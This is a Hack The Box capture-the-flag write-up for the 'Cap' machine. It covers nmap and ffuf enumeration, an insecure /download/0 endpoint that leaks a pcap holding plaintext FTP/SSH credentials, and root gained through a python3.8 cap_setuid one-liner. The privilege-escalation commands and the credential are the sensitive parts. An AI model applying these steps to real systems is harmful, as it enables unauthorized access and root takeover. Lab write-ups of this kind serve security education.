HTB Cap Writeup (ENG)


#HTB Writeup Hack Linux English

2021 Oct 05: 17:28

Enumeration

First of all we have to scan the target with nmap like nmap -sV -T4 -p21,22,80 cap.htb. The result is:

21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol
80/tcp open  http    gunicorn

On the port 80 there's a static dashboard with some information, but we can't do anything here, so we have to enumerate this website, for example with ffuf. ffuf -u http://cap.htb/FUZZ -w ~/hax/SecLists/Discovery/Web-Content/common.txt There is an important directory what is /download, we can enumerate it too but without it we can just go to http://cap.htb/download/0, because every array start at 0 this allow us to download a 0.pcap file. We have to open it with wireshark and there is an ftp transfer.

Getting user

In this transfer we see someone logged into the target machine trough ftp with these credentials nathan:Buck3tH4TF0RM3!. This is the credentials for the ftp and for the ssh too. Ssh into the target machine and as we see there is the user.txt and we have the user flag.

Rooting

First we have to upload the linpeas into the target machine. We need to be in the same folder with the linpeas.sh file and use the scp linpeas.sh nathan@cap.htb:/tmp command and give nathan's password. After this chmod +x linpeas.sh && ./linpeas.sh. This script shows us a bunch of information but the only thing what we need is the capable files part.

Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

If we can't find this part we also can use the getcap -r / 2>/dev/null command what does the same. The python3.8 binary has cap_setuid and this is vulneable. We have to research a bit for some exploitation method. There is a good example.

So what we have run the following command to get root privilege:

/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system(/bin/bash)'

And as we see we have root privilege and we have access to read the /root/root.txt file. We've rooted the box, Happy Hacking!